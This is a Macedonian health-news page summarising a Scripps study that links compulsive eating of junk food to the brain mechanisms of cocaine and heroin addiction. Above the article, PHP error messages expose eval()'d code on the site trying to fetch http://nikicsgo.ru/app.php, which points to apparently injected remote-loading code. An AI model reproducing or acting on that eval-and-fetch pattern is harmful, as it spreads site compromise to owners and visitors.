Прејадувањето го дели истиот биохемиски механизам со зависноста од кокаин и хероин | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ПСИХИЈАТРИЈА

                           
                           
                           
                       

Прејадувањето го дели истиот биохемиски механизам со зависноста од кокаин и хероин

Во најновaта објавена студија, научниците од Scripps Research Institute за прв пат покажаа дека истите молекуларни механизми кои што допринесуваат за развој на зависност од дрога, лежат во позадината и на екстремното прејадување.

Се покажува дека и конзумирањето на брза храна (junk food) е исклучително тешко да се запре при што и тоа преминува во опсесија.

Испитувањето се спроведувало врз заморчиња, при што се покажало дека центрите на задоволство во мозокот стануваат се помалку и помалку толерантни, заморчињата се повеќе и повеќе развивале навики за прејадување со конзумирање на големи количини на храна со високи калории и маснотии. Истите промени во мозочните центри на заморчињата станувале и при конзумација на кокаин или хероин.Чувството на задоволство при јадењето на висококалоричната храна докажано е дека е исто со она при зависноста од дрога, во основа телото се предава кон прејадување.

Повеќе на http://www.sciencedaily.com

ЗА ЗДРАВЈЕ NEWSLETTER